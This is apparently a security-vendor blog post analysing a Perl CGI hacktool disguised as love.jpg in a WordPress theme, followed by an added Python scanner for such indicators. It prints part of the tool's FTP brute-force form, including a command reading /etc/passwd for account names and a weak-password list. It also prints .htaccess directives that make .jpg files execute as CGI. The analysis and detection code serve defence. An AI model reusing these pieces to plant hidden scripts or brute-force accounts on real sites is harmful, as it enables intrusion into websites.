Hackers will do anything to hide their intentions behind the files they upload to compromised websites. This time, we’ve found a hacktool hidden inside a .jpg file.
As expected, the file was found inside the “images” directory of the WordPress Twenty Twelve theme and named love.jpg. Lovely, right? Using this tool, the attacker could not only manage, download, and upload files, but also attempt to brute force FTP user accounts.
Below we can see part of the code used for the brute force option:
#------------------------------------------------------------------------------
# Brute Forcer Form
#------------------------------------------------------------------------------
sub BruteForcerForm
{
my $result="";
$result .= <<END;
<table>
<tr>
<td colspan="2" align="center">
####################################<br>
FTP brute forcer<br>
Note: Only scan from 1 to 3 user<br>
####################################
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="bruteforcer"/>
</td>
</tr>
<tr>
<td>User:<br><textarea rows="18" cols="30" name="user">
END
# Pre-fills the user list with every local account name read from /etc/passwd
chop($result .= `less /etc/passwd | cut -d: -f1`);
$result .= <<'END';
</textarea></td>
<td>
Pass:<br>
<textarea rows="18" cols="30" name="pass">test
test1
test2
test3
test123
test12
1test
2test
3test
12test
123test
2012test
test2012
The list of passwords goes on. The malicious code attempts the most common and weakest passwords first, hoping to catch users who have not set strong credentials.
We also found this code inside the .htaccess file located in the same directory:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .jpg
The hacktool was written as a .cgi file, then disguised as a .jpg file so it would not look out of place inside the image directory. The .htaccess directives tell Apache to treat .jpg files in that directory as CGI scripts (AddType application/x-httpd-cgi .jpg) and allow them to execute (Options ExecCGI), so the disguised file still runs as intended.
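A defender-side check for the two indicators described in this post: an .htaccess that hands image extensions to a script handler or enables ExecCGI, and an image-named file whose first bytes are not an image header. This is an added example, not code from the original article; the directory layout and file contents it scans are constructed inline.

```python
import os
import re
import tempfile

# Directives that make Apache execute a file as a script. The .htaccess in the
# post used "AddType application/x-httpd-cgi .jpg" together with "Options ... ExecCGI".
HANDLER_RE = re.compile(
    r'^\s*(AddType|AddHandler|SetHandler)\s+\S*(cgi|php|perl)', re.I | re.M)
EXECCGI_RE = re.compile(r'^\s*Options\b.*\bExecCGI\b', re.I | re.M)
IMAGE_EXT = {'.jpg', '.jpeg', '.png', '.gif'}
IMAGE_MAGIC = (b'\xff\xd8\xff', b'\x89PNG\r\n\x1a\n', b'GIF87a', b'GIF89a')

def suspicious_htaccess(text):
    """True when .htaccess text maps files to a script handler or enables ExecCGI."""
    return bool(HANDLER_RE.search(text) or EXECCGI_RE.search(text))

def fake_image(path):
    """True when an image-named file lacks a known image header (e.g. starts with #!)."""
    with open(path, 'rb') as fh:
        head = fh.read(8)
    return not head.startswith(IMAGE_MAGIC)

def scan(root):
    """Walk a web root and return (finding-type, path) pairs for both indicators."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == '.htaccess':
                with open(path, 'r', errors='replace') as fh:
                    if suspicious_htaccess(fh.read()):
                        findings.append(('htaccess-handler', path))
            elif os.path.splitext(name)[1].lower() in IMAGE_EXT and fake_image(path):
                findings.append(('fake-image', path))
    return findings

def demo():
    """Constructed sample tree mirroring the post's layout (not real site data)."""
    root = tempfile.mkdtemp()
    img = os.path.join(root, 'images')
    os.makedirs(img)
    with open(os.path.join(img, '.htaccess'), 'w') as fh:
        fh.write('Options FollowSymLinks MultiViews Indexes ExecCGI\n'
                 'AddType application/x-httpd-cgi .jpg\n')
    with open(os.path.join(img, 'love.jpg'), 'wb') as fh:
        fh.write(b'#!/usr/bin/perl\nprint "placeholder";\n')  # script body, not JPEG bytes
    with open(os.path.join(img, 'real.jpg'), 'wb') as fh:
        fh.write(b'\xff\xd8\xff\xe0' + b'\x00' * 16)  # genuine JPEG header
    return sorted(kind for kind, _ in scan(root))

if __name__ == '__main__':
    print(demo())
```

Point `scan()` at a real document root to review every .htaccess and image file at once; a legitimate theme directory should produce no findings.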